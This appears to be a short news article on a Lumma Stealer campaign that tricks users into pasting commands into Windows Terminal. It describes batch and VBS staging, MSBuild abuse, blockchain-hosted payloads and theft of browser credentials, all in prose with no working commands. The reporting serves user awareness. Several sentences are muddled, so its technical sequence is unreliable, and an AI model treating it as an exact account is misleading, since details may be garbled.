Microsoft has uncovered a second attack vector used by cybercriminals to deliver the Lumma Stealer malware. Recently, the Microsoft Threat Intelligence team found a deeply concerning trend. … against Windows Terminal, a terminal emulator program popularly used amongst most sysadmins. The attack pathway as it was rolled out in February 2026. It guides users through a list of actions that fool them into running harmful commands while hiding the commands within contextually appropriate admin actions.
The second stage attack starts when users are asked to copy a zipped command and paste it into Windows Terminal. This command downloads the batch script and saves it into the users “AppData\Local” folder via cmd.exe. The batch script then creates a Visual Basic Script into the Temp directory (usually %TEMP%). That’s because this script is executed via MSBuild.exe. Experts refer to this as LOLBin abuse, in which legitimate binaries are misused for malicious purposes.
Details of the Attack Pathway
On this particular attack pathway, they do so in a particularly insidious way. It preys on user’s trust into legitimate tools built into the system. By leveraging the Windows Terminal, attackers establish an environment that is completely indistinguishable from typical administrative workflows.
According to the Microsoft Threat Intelligence team, “This campaign instructs targets to use the Windows + X → I shortcut to launch Windows Terminal (wt.exe) directly, guiding users into a privileged command execution environment that blends into legitimate administrative workflows and appears more trustworthy to users.”
Once the batch script runs, it retrieves a ZIP payload, containing a legit but renamed 7-Zip binary. This binary is stored on disk with a randomized file name, further hiding the download’s malicious intent.
Abusive Techniques and Their Implications
Running this batch script with MSBuild.exe uncovers a profound LOLBins abuse. This step subjects the malware to connect to Crypto Blockchain RPC endpoints. In examining the full connection, we can see the use of an etherhiding technique. Attackers are increasingly wielding blockchain technology to help hide from authorities.
The batch script is then executed via cmd.exe with the /launched command-line argument. The same batch script is then executed through MSBuild.exe, resulting in LOLBin abuse,” stated the Microsoft Threat Intelligence team. This complicated method enables the most determined attackers to obtain sensitive browser artifacts. These artifacts run the gamut from Web Data to Login Data and they exfiltrate these artifacts to their own infrastructure.
User Awareness and Prevention
Amid growing and persistent cyber threats, user awareness is still the best line of defense. Even more alarming, the use of the attack pathway relies on extremely commonly used system tools. This underscores the need for users to remain alert when running commands and downloading files.
Read closely any steps that prompt you to use system utilities such as Windows Terminal for purposes they weren’t designed for. The impact from this latest breach is huge, and nonprofits need to be on the lookout to protect their valuable assets from compromising data breaches.